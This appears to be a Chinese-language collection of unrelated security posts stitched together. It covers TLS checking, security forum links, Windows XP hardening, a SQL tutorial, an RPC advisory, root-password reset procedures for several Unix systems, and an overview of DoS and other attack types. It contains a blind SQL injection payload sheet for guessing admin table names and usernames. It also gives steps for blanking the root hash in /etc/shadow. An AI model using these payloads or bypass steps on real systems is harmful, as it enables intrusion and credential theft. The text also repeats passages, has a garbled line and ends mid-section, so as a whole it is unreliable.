为了安全,目前所有网站都要求升级到TLS1.2或者TLS1.3。对于SSL和TLS1.0,TLS1.1,新的浏览器已经停止支持。

也就是说如果你的网站不支持TLS1.2或者1.3的话,那么也就是说你的网站无法访问了。

那么要怎么检测你的网站支持多少的SSL/TLS版本呢?

  1. Qualys SSL Labs – https://www.ssllabs.com/ssltest/
    Qualys SSL Labs是一个在线的网站安全检测网站。你只需要输入你的网站地址,就可以得到检测报告及评分。
  2. NMAP – https://nmap.org/
    NMAP是一个开源的网络安全工具,可以检测目标IP的打开端口,也可以用于检测https的SSL/TLS版本。

    检测所使用的命令行为: nmap –script ssl-enum-ciphers -p 443 acme.com

OK,大家玩得开心。

国内

www.t00ls.net

t00ls是国内比较低调的民间组织,论坛质量较高。

“80vul”

黑哥所在团队,博客内容质量很好。

Worm.cc

我所在邪红色信息安全组织的不知名博客,不定期更新有趣的安全研究文章。

FreeBuf.COM关注黑客与极客

FreeBuf黑客与极客,高质量的全球互联网安全媒体平台。

Sebug漏洞库: 漏洞目录、安全文档、漏洞趋势

Sebug是我们(知道创宇)漏洞分享平台,从2006年开始,Sebug是国内最早最全的漏洞搜集平台。

网络安全攻防研究室

为网络安全爱好者们提供技术交流平台,里面有工具以及安全教程。

SecWiki-安全维基,汇集国内外优秀安全资讯、工具和网站

提供一个安全资讯分享平台,大家将看到的好文章,工具与优秀RSS提交分享。

腾讯安全应急响应中心

腾讯安全应急中心博客,更新他们所研究的部分成果分析。

黑吧安全网 – 中国最早的IT技术门户网 成就IT精英 (网络安全

黑吧安全网,也是一个比较老牌的门户网站。

看雪安全论坛

看雪安全论坛,底层安全研究人员较多。

WooYun知识库

乌云知识库,里面更新安全相关文章,质量不错。

WooYun.org | 自由平等开放的漏洞报告平台

乌云漏洞平台,提交漏洞可获得帐号,国内最大的漏洞提交平台。

吾爱破解论坛-LCG-LSG|软件安全

吾爱破解论坛,国内大部分破解注册机等出于这个论坛,专注于软件安全病毒分析。

 继续阅读

  第一招、屏幕保护

  在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。

  提示:部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del”的组合键,因此需要设置完成之后测试一下程序是否存在这个重大Bug。

  不过,屏幕保护最快只能在用户离开1分钟之后自动启动,难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?其实我们只要打开Windows安装目录里面的system子目录,然后找到相应的屏幕保护程序(扩展名是SCR),按住鼠标右键将它们拖曳到桌面上,选择弹出菜单中的“在当前位置创建快捷方式”命令,在桌面上为这些屏幕保护程序建立一个快捷方式。

  此后,我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。

  第二招、巧妙隐藏硬盘

  在“按Web页”查看方式下,进入Windows目录时都会弹出一句警告信息,告诉你这是系统文件夹如果“修改该文件夹的内容可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,这时单击“显示文件”就可以进入该目录了。

  原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件,之前必须在文件夹选项中单击“查看”标签,选择“显示所有文件”,这样就可以看见这两个文件了)。再按“F5”键刷新一下,看看发生了什么,是不是和进入Windows目录时一样。

  接下来我们用“记事本”打开folder.htt,这是用HTML语言编写的一个文件,发挥你的想像力尽情地修改吧。

  如果你不懂HTML语言也没关系,先找到“显示文件”将其删除,找到“修改该文件夹的内可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,将其改为自己喜欢的文字,例如“安全重地,闲杂人等请速离开”。

  将“要查看该文件夹的内容,请单击”改为“否则,后果自负!”,接着向下拖动滑块到倒数第9行,找到“(file://%TEMPLATEDIR%wvlogo.gif)”这是显示警告信息时窗口右下角齿轮图片的路径,将其改为自己图片的路径,例如用“d: upian upian1.jpg”替换“//”后面的内容,记住这里必须将图片的后缀名打出,否则将显示不出图片。

  当然,你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果,然后只要将原文件拷贝到下面这段文字的后面,覆盖掉原文件中“~”之间的内容就可以了。

  *ThisfilewasautomaticallygeneratedbyMicrosoftInternetEXPlorer5.0

  *usingthefile%THISDIRPATH%folder.htt.

   保存并退出,按“F5”键刷新一下,是不是很有个性?接下来要作的就是用“超级兔子”将你所要的驱动器隐藏起来,不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的,就是干脆将folder.htt原文件中“~”之间的内容全部删除,这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象,使其中的文件更安全。

  第三招、禁用“开始”菜单命令

  在Windows2000/XP中都集成了组策略的功能,通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行“开始→运行”命令,在“运行”对话框的“打开”栏中输入“gpedit.msc”,然后单击“确定”按钮即可启动WindowsXP组策略编辑器。

  在“本地计算机策略”中,逐级展开“用户配置→管理模板→任务栏和开始菜单”分支,在右侧窗口中提供了“任务栏”和“开始菜单”的有关策略。

  在禁用“开始”菜单命令的时候,在右侧窗口中,提供了删除“开始”菜单中的公用程序组、“我的文档”图标、“文档”菜单、“网上邻居”图标等策略。清理“开始”菜单的时候只要将不需要的菜单项所对应的策略启用即可,比如以删除“我的文档”图标为例,具体操作步骤为:

  1)在策略列表窗口中用鼠标双击“从开始菜单中删除我的文档图标”选项。

  2)在弹出窗口的“设置”标签中,选择“已启用”单选按钮,然后单击“确定”即可。

  第四招、桌面相关选项的禁用

  WindowsXP的桌面就像你的办公桌一样,有时需要进行整理和清洁。有了组策略编辑器之后,这项工作将变得易如反掌,只要在“本地计算机策略”中展开“用户配置→管理模板→桌面”分支,即可在右侧窗口中显示相应的策略选项。

  1)隐藏桌面的系统图标

  倘若隐藏桌面上的系统图标,传统的方法是通过采用修改注册表的方式来实现,这势必造成一定的风险性,采用组策略编辑器,即可方便快捷地达到此目的。

  若要隐藏桌面上的“网上邻居”和“InternetEXPlorer”图标,只要在右侧窗口中将“隐藏桌面上网上邻居图标”和“隐藏桌面上的InternetEXPlorer图标”两个策略选项启用即可。如果隐藏桌面上的所有图标,只要将“隐藏和禁用桌面上的所有项目”启用即可。

  当启用了“删除桌面上的我的文档图标”和“删除桌面上的我的电脑图标”两个选项以后,“我的电脑”和“我的文档”图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢“回收站”这个图标,那么也可以把它给删除,具体方法是将“从桌面删除回收站”策略项启用。

  2)禁止对桌面的某些更改

  如果你不希望别人随意改变计算机桌面的设置,请在右侧窗口中将“退出时不保存设置”这个策略选项启用。当你启用这个了设置以后,其他用户可以对桌面做某些更改,但有些更改,诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。

  第五招、禁止访问“控制面板”

  如果你不希望其他用户访问计算机的控制面板,你只要运行组策略编辑器,并在左侧窗口中展开“本地计算机策略→用户配置→管理模板→控制面板”分支,然后将右侧窗口的“禁止访问控制面板”策略启用即可。

  此项设置可以防止控制面板程序文件的启动,其结果是他人将无法启动控制面板或运行任何控制面板项目。另外,这个设置将从“开始”菜单中删除控制面板,同时这个设置还从Windows资源管理器中删除控制面板文件夹。

  提示:如果你想从上下文菜单的属性项目中选择一个“控制面板”项目,会出现一个消息,说明该设置防止这个操作。

  第六招、设置用户权限

  当多人共用一台计算机时,在WindowsXP中设置用户权限,可以按照以下步骤进行:

  1)运行组策略编辑器程序。

  2)在编辑器窗口的左侧窗口中逐级展开“计算机配置→Windows设置→安全设置→本地策略→用户权限指派”分支。

  3)双击需要改变的用户权限,单击“添加用户或组”按钮,然后双击想指派给权限的用户账号,最后单击“确定”按钮退出。

  第七招、文件夹设置审核

  WindowsXP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件,而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的安全。为文件和文件夹设置审核的步骤如下:

  1)在组策略窗口中,逐级展开右侧窗口中的“计算机配置→Windows设置→安全设置→本地策略”分支,然后在该分支下选择“审核策略”选项。

  2)在右侧窗口中用鼠标双击“审核对象访问”选项。

  3)用鼠标右键单击想要审核的文件或文件夹,选择弹出菜单的“属性”命令,接着在弹出的窗口中选择“安全”标签。

  4)单击“高级”按钮,然后选择“审核”标签。

  5)根据具体情况选择你的操作:

  倘若对一个新组或用户设置审核,可以单击“添加”按钮,并且在“名称”框中键入新用户名,然后单击“确定”按钮打开“审核项目”对话框。

  要查看或更改原有的组或用户审核,可以选择用户名,然后单击“查看/编辑”按钮。

  要删除原有的组或用户审核,可以选择用户名,然后单击“删除”按钮即可。

  6)如有必要的话,在“审核项目”对话框中的“应用到”列表中选取你希望审核的地方。

  7)如果想禁止目录树中的文件和子文件夹继承这些审核项目,选择“仅对此容器内的对象和/或容器应用这些审核项”复选框。

  注意:必须是管理员组成员或在组策略中被授权有“管理审核和安全日志”权限的用户可以审核文件或文件夹。在WindowsXP审核文件、文件夹之前,你必须启用组策略中“审核策略”的“审核对象访问”。否则,当你设置完文件、文件夹审核时会返回一个错误消息,并且文件、文件夹都没有被审核。

检测可否注入
http://127.0.0.1/xx?id=11 and 1=1 (正常页面)
http://127.0.0.1/xx?id=11 and 1=2 (出错页面)

检测表段的
http://127.0.0.1/xx?id=11 and exists (select * from admin)

检测字段的
http://127.0.0.1/xx?id=11 and exists (select username from admin)

检测ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)

检测长度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

检测长度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

检测是否为MSSQL数据库
http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)

检测是否为英文

(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)

(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)

检测英文的范围

(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)

(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)

检测那个字符

(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)

(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)

常用函数

Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII码

Access:chr(数字) SQLServer:nchar(数字)
作用:与asc相反,根据ASCII码返回字符

Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串

Access:abc(数字) SQLServer:abc (数字)
作用:返回数字的绝对值(在猜解汉字的时候会用到)

Access:A between B And C SQLServer:A between B And C
作用:判断A是否界于B与C之间

and exists(Select top 1 * From 用户 order by id)

1.在查询结果中显示列名:

a.用as关键字:select name as ’姓名’ from students order by age
b.直接表示:select name ’姓名’ from students order by age

2.精确查找:

a.用in限定范围:select * from students where native in (’湖南’, ’四川’)
b.between…and:select * from students where age between 20 and 30

c.“=”:select * from students where name = ’李山’

d. like:select * from students where name like ’李%’ (注意查询条件中有“%”,则说明是部分匹配,而且还有先后信息在里面,即查找以“李”开头的匹配项。所以若查询有“李”的所有对象,应该命令:’%李%’;若是第二个字为李,则应为’_李%’或’_李’或’_李_’。)

e.[]匹配检查符:select * from courses where cno like ’[AC]%’ (表示或的关系,与"in(…)"类似,而且"[]"可以表示范围,如:select * from courses where cno like ’[A-C]%’)

3.对于时间类型变量的处理

a.smalldatetime:直接按照字符串处理的方式进行处理,例如:select * from students where birth > = ’1980-1-1’ and birth <= ’1980-12-31’

4.集函数

a.count()求和,如:select count(*) from students (求学生总人数)
b.avg(列)求平均,如:select avg(mark) from grades where cno=’B2’
c.max(列)和min(列),求最大与最小

5.分组group

常用于统计时,如分组查总数:select gender,count(sno) from students group by gender(查看男女学生各有多少)
注意:从哪种角度分组就从哪列"group by"
对于多重分组,只需将分组规则罗列。比如查询各届各专业的男女同学人数 ,那么分组规则有:届别(grade)、专业(mno)和
性别(gender),所以有"group by grade, mno, gender"
select grade, mno, gender, count(*) from students group by grade, mno, gender
通常group还和having联用,比如查询1门课以上不及格的学生,则按学号(sno)分类有:
select sno,count(*) from grades where mark<60 group by sno having count(*)>1

6.UNION联合

合并查询结果,如:
SELECT * FROM students WHERE name like ‘张%’UNION [ALL] SELECT * FROM students WHERE name like ‘李%’

7.多表查询

a.内连接
select g.sno,s.name,c.coursename from grades g JOIN students s ON g.sno=s.sno JOIN courses c ON g.cno=c.cno
(注意可以引用别名)

b.外连接

b1.左连接

select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades ON courses.cno=grades.cno group by courses.cno

左连接特点:显示全部左边表中的所有项目,即使其中有些项中的数据未填写完全。

左外连接返回那些存在于左表而右表中却没有的行,再加上内连接的行。

b2.右连接

与左连接类似

b3.全连接

select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno

两边表中的内容全部显示

c.自身连接

select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno

采用别名解决问题。

d.交*连接

select lastname+firstname from lastname CROSS JOIN firstanme

相当于做笛卡儿积

8.嵌套查询

a.用关键字IN,如查询猪猪山的同乡:

select * from students where native in (select native from students where name=’猪猪’)

b.使用关键字EXIST,比如,下面两句是等价的:

select * from students where sno in (select sno from grades where cno=’B2’)
select * from students where exists (select * from grades where grades.sno=students.sno AND cno=’B2’)

9.关于排序order

a.对于排序order,有两种方法:asc升序和desc降序

b.对于排序order,可以按照查询条件中的某项排列,而且这项可用数字表示,如:
select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)>85 order by 3

10.其他

a.对于有空格的识别名称,应该用"[]"括住。

b.对于某列中没有数据的特定查询可以用null判断,如select sno,courseno from grades where mark IS NULL

c.注意区分在嵌套查询中使用的any与all的区别,any相当于逻辑运算“  ”而all则相当于逻辑运算“&&”

d.注意在做否定意义的查询是小心进入陷阱:

如,没有选修‘B2’课程的学生 :
select students.* from students, grades where students.sno=grades.sno AND grades.cno <> ’B2’

上面的查询方式是错误的,正确方式见下方:
select * from students where not exists (select * from grades where grades.sno=students.sno AND cno=’B2’)

11.关于有难度多重嵌套查询的解决思想:如,选修了全睝@纬痰难?br>select * from students where not exists (select * from courses where NOT EXISTS (select * from grades where sno=students.sno AND cno=courses.cno))

最外一重:从学生表中选,排除那些有课没选的。用not exist。由于讨论对象是课程,所以第二重查询从course表中找,排除那些选了课的即可

影响:

入侵者可以藉此漏洞修改网页、获得该主机管理权。

事件描述:

在遭受攻击的 UNIX 系统上,入侵者常利用下列

 

  rpc.ttdbserver
  rpc.cmsd 
  rpc.statd/automountd
  sadmind

程序的 Buffer Overflow 漏洞自远程入侵主机。

解决方法:

1.将不必要的 RPC service 自 /etc/inetd.conf 中移除,移除方法为

(1)编辑 /etc/inetd.conf,将不必要的 service 前面加上 "#" 或直接删除后存盘;

(2)kill -HUP inetd.pid。

2.安装修补程序 (patch)

(1)rpc.statd 及 automountd

Solaris:请依照您的版本安装下列修补程序

 

rpc.statd:
    
    OS Version        Patch ID 
    __________        _________
    
    SunOS 5.6         106592-02 
    SunOS 5.6_x86     106593-02 
    SunOS 5.5.1       104166-04 
    SunOS 5.5.1_x86   104167-04  
    SunOS 5.5         103468-04 
    SunOS 5.5_x86     103469-05 
    SunOS 5.4         102769-07 
    SunOS 5.4_x86     102770-07 
    SunOS 5.3         102932-05 
    
    automountd:
    
    OS Version        Patch ID  
    __________        _________ 
    SunOS 5.5.1       104654-05 
    SunOS 5.5.1_x86   104655-05 
    SunOS 5.5         103187-43 
    SunOS 5.5_x86     103188-43 
    SunOS 5.4         101945-61 
    SunOS 5.4_x86     101946-54 
    SunOS 5.3         101318-92

档案可至下列 URL 下载:
  ftp://sunsolve.sun.com/pub/patches
RedHat:
请参考下列 URL:
  http://www.redhat.com/support/errata/RHSA-2000-043-03.HTML
Debian:
请参考下列 URL:
  http://www.debian.org/security/2000/20000719a
(2)rpc.cmsd
Solaris:
请依照您的版本安装下列修补程序
OpenWindows:

SunOS version     Patch ID
     _____________     _________
     SunOS 5.5.1       104976-04
     SunOS 5.5.1_x86   105124-03
     SunOS 5.5         103251-09
     SunOS 5.5_x86     103273-07
     SunOS 5.3         101513-14
     SunOS 4.1.4       100523-25
     SunOS 4.1.3_U1    100523-25

  CDE:



     CDE version       Patch ID
     ___________       ________
     1.3               107022-03
     1.3_x86           107023-03
     1.2               105566-07
     1.2_x86           105567-08

档案可至下列 URL 下载:
ftp://sunsolve.sun.com/pub/patches
(3)rpc.ttdbserverd
Solaris:
请依照您的版本安装下列修补程序

SunOS version    Patch ID 
      _____________    _________

      5.7              107893-04
      5.7_x86          107894-04 
      5.6              105802-11 
      5.6_x86          105803-13
      5.5.1            104489-10
      5.5.1_x86        105496-08
      5.5              104428-08
      5.5_x86          105495-06
      5.4              102734-05

档案可至下列 URL 下载:
ftp://sunsolve.sun.com/pub/patches
(4)sadmind
Solaris:
请依照您的版本安装下列修补程序

OS Version             Patch ID        
     __________             _________
     SunOS 5.7              108662-01   
     SunOS 5.7_x86          108663-01    
     SunOS 5.6              108660-01   
     SunOS 5.6_x86          108661-01   
     SunOS 5.5.1            108658-01
     SunOS 5.5.1_x86        108659-01

  一.freebsd

  FreeBSD 4.7

  当显示 boot … 9 seconds按任意健

  输入:boot -s

  登录以后

  #/sbin/mount -a

  #passwd

  输入新密码.

  FreeBSD 5.*

  当要求选择启动模式时按4进入单用户模式登录以后

  #/sbin/mount -a

  #passwd

  输入新密码.

  二.solaris

  ROOT密码遗忘的处理方法

  1,如果还能用普通用户登陆的话,%df /etc,确定包含/etc目录分区的设备名

  %df /etc

  / /dev/dsk/c0t0d0s0…

  此例中是c0t0d0s0,如果你的根目录分区设备不一样的话,替换一下就可以啦

  2,把系统盘插入cdrom中

  3,出现提示符后,使用sync命令刷新文件系统

  4,按下stop+A

  5,ok状态下键入boot cdrom -s

  6,在#提示符下键入mkdir /temp ,然后键入mount /dev/dsk/c0t0d0s0 /temp

  如果出现挂接不上的情况时,那么就运行fsck先 fsck /dev/rdsk/c0t0d0s0,然后在mount

  7,cd /temp/etc

  8,cp shadow shadowbak

  9,cat shadow

  得到root的口令字符串

  root:djglcj0J:6453::::(其中djglcj0J就是root的加密后的口令字符串)

  10,sed s/djglcj0J// shadow>shadownew

  11,cat shadownew查看是否已经变为

  root::6453::::

  12,cp shadownew shadow

  13,cd /

  unmount /temp

  sync

  shutdown -i0 -g0 -y

  3,出现提示符后,使用sync命令刷新文件系统

  4,按下stop+A

  5,ok状态下键入boot cdrom -s

  6,在#提示符下键入mkdir /temp ,然后键入mount /dev/dsk/c0t0d0s0 /temp

  如果出现挂接不上的情况时,那么就运行fsck先 fsck /dev/rdsk/c0t0d0s0,然后在mount

  7,cd /temp/etc

  8,cp shadow shadowbak

  9,cat shadow

  得到root的口令字符串

  root:djglcj0J:6453::::(其中djglcj0J就是root的加密后的口令字符串)

  10,sed s/djglcj0J// shadow>shadownew

  11,cat shadownew查看是否已经变为

  root::6453::::

  12,cp shadownew shadow

  13,cd /

  unmount /temp

  sync

  shutdown -i0 -g0 -y

  14,取出CD后,重起系统,这时root就不需要密码啦!

  这样也可以!

  OK boot cdrom -s

  #TERM=sun

  #export TERM

  #mount /dev/dsk/c0t0d0s0 /a

  #vi /a/etc/shadow(删除root的加密后的密码)

  #reboot

  三.SCO UNIX

  一旦运行SCO UNIX 机器的超级用户口令忘了,可以用这个方法解决。

  在另一台安装了SCO UNIX的机器上,以Root用户注册,进入系统,用 mkdev fd命令或命令scoadmin中的Filesystem之Floppy Filesystem Manager来制作应急启动盘,包括Boottable 盘和Root filesystem盘。

  将上述制作的Root filesystem盘安装到硬盘上。

  # mount /dev/fd0135ds18 /mnt

  再将硬盘上的/etc/passwd 和/tcb/files/auth/r/root两个文件拷贝到Root filesystem盘上。

  # cp /etc/passwd /mnt

  # cp /tcb/files/auth/r/root /mnt

  卸载机器1硬盘上的软盘。

  # umount /dev/rfd0135ds18

  用Boot软盘去启动遗忘口令的机器,根据提示插入Root filesystem软盘,待出现“#”时,进行下面操作,将硬盘挂到软盘上:

  # mount /dev/hd0root /mnt

  备份硬盘上的/etc/passwd和/tcb/files/auth/r/root两个文件。因为这两个文件中还包含其他用户的注册信息。

  用Root filesystem软盘上的两个文件,覆盖硬盘上的两个文件/etc/passwd 和/tcb/files/auth/r/root。

  # mkdir /cyh

  # mount /dev/fd0135ds18 /cyh

  # cd /cyh

  # cp passwd /mnt/etc

  # cp root /mnt/tcb/files/auth

  卸载安装上的两个文件系统。

  # umount /dev/hd0root

  # umount /dev/fd0135ds18

  取出软盘,重新启动机器,待出现Login时,以Root用户注册,键入第二台机器的超级用户口令,这样便可进入的超级用户了。

  进入超级用户后,用Passwd和Root这两个文件的备份覆盖原来的文件,接着用passwd命令修改超级用户的口令。

  用户可以用Alt+F2换一个窗口,以Root注册,现在用修改后的口令就能用了。

  四.aix4.3.3(ibm) rs/6000

  将第一张安装盘放入光驱,重起机器,按f5键,终端按5,进入maintance页面,选择mount rootvg的功能选项,调用password修改口令,退出即可

  五.linux

  三种办法:

  1.在系统进入单用户状态,直接用passwd root去更改

  2.用安装光盘引导系统,进行linux rescue状态,将原来/分区挂接上来,作法如下:

  cd /mnt

  mkdir hd

  mount -t auto /dev/hdaX(原来/分区所在的分区号) hd

  cd hd

  chroot ./

  passwd root

  这样可以搞定

  3.将本机的硬盘拿下来,挂到其他的linux系统上,采用的办法与第二种相同

  6.redhat 8 redhat9

  (1). lilo法

  1. 在出现 lilo: 提示时键入 linux single

  画面显示 lilo: linux single

  2. 回车可直接进入linux命令行

  3. #vi /etc/shadow

  将第一行,即以root开头的一行中root:后和下一个:前的内容删除,

  第一行将类似于

  root::……

  保存

  4. #reboot重启,root密码为空

  (2). grub法

  1. 在出现grub画面时,用上下键选中你平时启动linux的那一项(别选dos哟),然后按e键

  2. 再次用上下键选中你平时启动linux的那一项(类似于kernel /boot/vmlinuz-2.4.18-14 ro root=LABEL=/),然后按e键

  3. 修改你现在见到的命令行,加入single,结果如下:

  kernel /boot/vmlinuz-2.4.18-14 single ro root=LABEL=/

  4. 回车返回,然后按b键启动,即可直接进入linux命令行

  5. #vi /etc/shadow

  将第一行,即以root开头的一行中root:后和下一个:前的内容删除,

  第一行将类似于

  root::……

  保存

  6. #reboot重启,root密码为空

  7.HP-UX

  启动时按esc 进入isl

  进入ISL后:

  isl>bo pri

  (yes/no)y

  ipl>hpux -is

  ipl>vi /etc/passwd

  去掉root 的密码即可。

    1、服务拒绝攻击

    服务拒绝攻击企图通过使你的服务计算机崩溃或把它压跨来阻止你提供服务,服务拒绝攻击是最容易实施的攻击行为,主要包括:

    死亡之ping (ping of death)

    概览:由于在早期的阶段,路由器对包的最大尺寸都有限制,许多操作系统对TCP/IP栈的实现在ICMP包上都是规定64KB,并且在对包的标题头进行读取之后,要根据该标题头里包含的信息来为有效载荷生成缓冲区,当产生畸形的,声称自己的尺寸超过ICMP上限的包也就是加载的尺寸超过64K上限时,就会出现内存分配错误,导致TCP/IP堆栈崩溃,致使接受方当机。

    防御:现在所有的标准TCP/IP实现都已实现对付超大尺寸的包,并且大多数防火墙能够自动过滤这些攻击,包括:从windows98之后的windows,NT(service pack 3之后),linux、Solaris、和Mac OS都具有抵抗一般ping ofdeath攻击的能力。此外,对防火墙进行配置,阻断ICMP以及任何未知协议,都讲防止此类攻击。

    泪滴(teardrop)

    概览:泪滴攻击利用那些在TCP/IP堆栈实现中信任IP碎片中的包的标题头所包含的信息来实现自己的攻击。IP分段含有指示该分段所包含的是原包的哪一段的信息,某些TCP/IP(包括servicepack 4以前的NT)在收到含有重叠偏移的伪造分段时将崩溃。

    防御:服务器应用最新的服务包,或者在设置防火墙时对分段进行重组,而不是转发它们。

    UDP洪水(UDP flood)

    概览:各种各样的假冒攻击利用简单的TCP/IP服务,如Chargen和Echo来传送毫无用处的占满带宽的数据。通过伪造与某一主机的Chargen服务之间的一次的UDP连接,回复地址指向开着Echo服务的一台主机,这样就生成在两台主机之间的足够多的无用数据流,如果足够多的数据流就会导致带宽的服务攻击。

    防御:关掉不必要的TCP/IP服务,或者对防火墙进行配置阻断来自Internet的请求这些服务的UDP请求。

    SYN洪水(SYN flood)

    概览:一些TCP/IP栈的实现只能等待从有限数量的计算机发来的ACK消息,因为他们只有有限的内存缓冲区用于创建连接,如果这一缓冲区充满了虚假连接的初始信息,该服务器就会对接下来的连接停止响应,直到缓冲区里的连接企图超时。在一些创建连接不受限制的实现里,SYN洪水具有类似的影响。

    防御:在防火墙上过滤来自同一主机的后续连接。

    未来的SYN洪水令人担忧,由于释放洪水的并不寻求响应,所以无法从一个简单高容量的传输中鉴别出来。
    Land攻击

    概览:在Land攻击中,一个特别打造的SYN包它的原地址和目标地址都被设置成某一个服务器地址,此举将导致接受服务器向它自己的地址发送SYN-ACK消息,结果这个地址又发回ACK消息并创建一个空连接,每一个这样的连接都将保留直到超时掉,对Land攻击反应不同,许多UNIX实现将崩溃,NT变的极其缓慢(大约持续五分钟)。

    防御:打最新的补丁,或者在防火墙进行配置,将那些在外部接口上入站的含有内部源地址滤掉。(包括10域、127域、192.168域、172.16到172.31域)。

    Smurf攻击

    概览:一个简单的smurf攻击通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求(ping)数据包来淹没受害主机的方式进行,最终导致该网络的所有主机都对此ICMP应答请求作出答复,导致网络阻塞,比pingof death洪水的流量高出一或两个数量级。更加复杂的Smurf将源地址改为第三方的受害者,最终导致第三方雪崩。

    防御:为了防止黑客利用你的网络攻击他人,关闭外部路由器或防火墙的广播地址特性。为防止被攻击,在防火墙上设置规则,丢弃掉ICMP包。

    Fraggle攻击

    概览:Fraggle攻击对Smurf攻击作了简单的修改,使用的是UDP应答消息而非ICMP。

    防御:在防火墙上过滤掉UDP应答消息。

    电子邮件炸弹

    概览:电子邮件炸弹是最古老的匿名攻击之一,通过设置一台机器不断的大量的向同一地址发送电子邮件,攻击者能够耗尽接受者网络的带宽。

    防御:对邮件地址进行配置,自动删除来自同一主机的过量或重复的消息。

    畸形消息攻击

    概览:各类操作系统上的许多服务都存在此类问题,由于这些服务在处理信息之前没有进行适当正确的错误校验,在收到畸形的信息可能会崩溃。

    防御:打最新的服务补丁。

    2、利用型攻击

    利用型攻击是一类试图直接对你的机器进行控制的攻击,最常见的有三种:

    口令猜测

    概览:一旦黑客识别了一台主机而且发现了基于NetBIOS、Telnet或NFS这样的服务的可利用的用户帐号,成功的口令猜测能提供对机器控制。

    防御:要选用难以猜测的口令,比如词和标点符号的组合。确保像NFS、NetBIOS和Telnet这样可利用的服务不暴露在公共范围。如果该服务支持锁定策略,就进行锁定。

    特洛伊木马

    概览:特洛伊木马是一种或是直接由一个黑客,或是通过一个不令人起疑的用户秘密安装到目标系统的程序。一旦安装成功并取得管理员权限,安装此程序的人就可以直接远程控制目标系统。

    最有效的一种叫做后门程序,恶意程序包括:NetBus、BackOrifice和BO2k,用于控制系统的良性程序如:netcat、VNC、pcAnywhere。理想的后门程序透明运行。

    防御:避免下载可疑程序并拒绝执行,运用网络扫描软件定期监视内部主机上的监听TCP服务。

    缓冲区溢出

   概览:由于在很多的服务程序中大意的程序员使用象strcpy(),strcat()类似的不进行有效位检查的函数,最终可能导致恶意用户编写一小段利用程序来进一步打开安全豁口然后将该代码缀在缓冲区有效载荷末尾,这样当发生缓冲区溢出时,返回指针指向恶意代码,这样系统的控制权就会被夺取。

    防御:利用SafeLib、tripwire这样的程序保护系统,或者浏览最新的安全公告不断更新操作系统。

    3、信息收集型攻击

    信息收集型攻击并不对目标本身造成危害,如名所示这类攻击被用来为进一步入侵提供有用的信息。主要包括:扫描技术、体系结构刺探、利用信息服务。

    扫描技术

    地址扫描

   概览:运用ping这样的程序探测目标地址,对此作出响应的表示其存在。

    防御:在防火墙上过滤掉ICMP应答消息。

    端口扫描

    概览:通常使用一些软件,向大范围的主机连接一系列的TCP端口,扫描软件报告它成功的建立了连接的主机所开的端口。

    防御:许多防火墙能检测到是否被扫描,并自动阻断扫描企图。

    反响映射

    概览:黑客向主机发送虚假消息,然后根据返回“hostunreachable”这一消息特征判断出哪些主机是存在的。目前由于正常的扫描活动容易被防火墙侦测到,黑客转而使用不会触发防火墙规则的常见消息类型,这些类型包括:RESET消息、SYN-ACK消息、DNS响应包。

    防御:NAT和非路由代理服务器能够自动抵御此类攻击,也可以在防火墙上过滤“hostunreachable”ICMP应答。

    慢速扫描

    概览:由于一般扫描侦测器的实现是通过监视某个时间桢里一台特定主机发起的连接的数目(例如每秒10次)来决定是否在被扫描,这样黑客可以通过使用扫描速度慢一些的扫描软件进行扫描。

    防御:通过引诱服务来对慢速扫描进行侦测。

    体系结构探测

    概览:黑客使用具有已知响应类型的数据库的自动工具,对来自目标主机的、对坏数据包传送所作出的响应进行检查。由于每种操作系统都有其独特的响应方法(例NT和Solaris的TCP/IP堆栈具体实现有所不同),通过将此独特的响应与数据库中的已知响应进行对比,黑客经常能够确定出目标主机所运行的操作系统。

    防御:去掉或修改各种BANNer,包括操作系统和各种应用服务的,阻断用于识别的端口扰乱对方的攻击计划。
利用信息服务

    DNS域转换

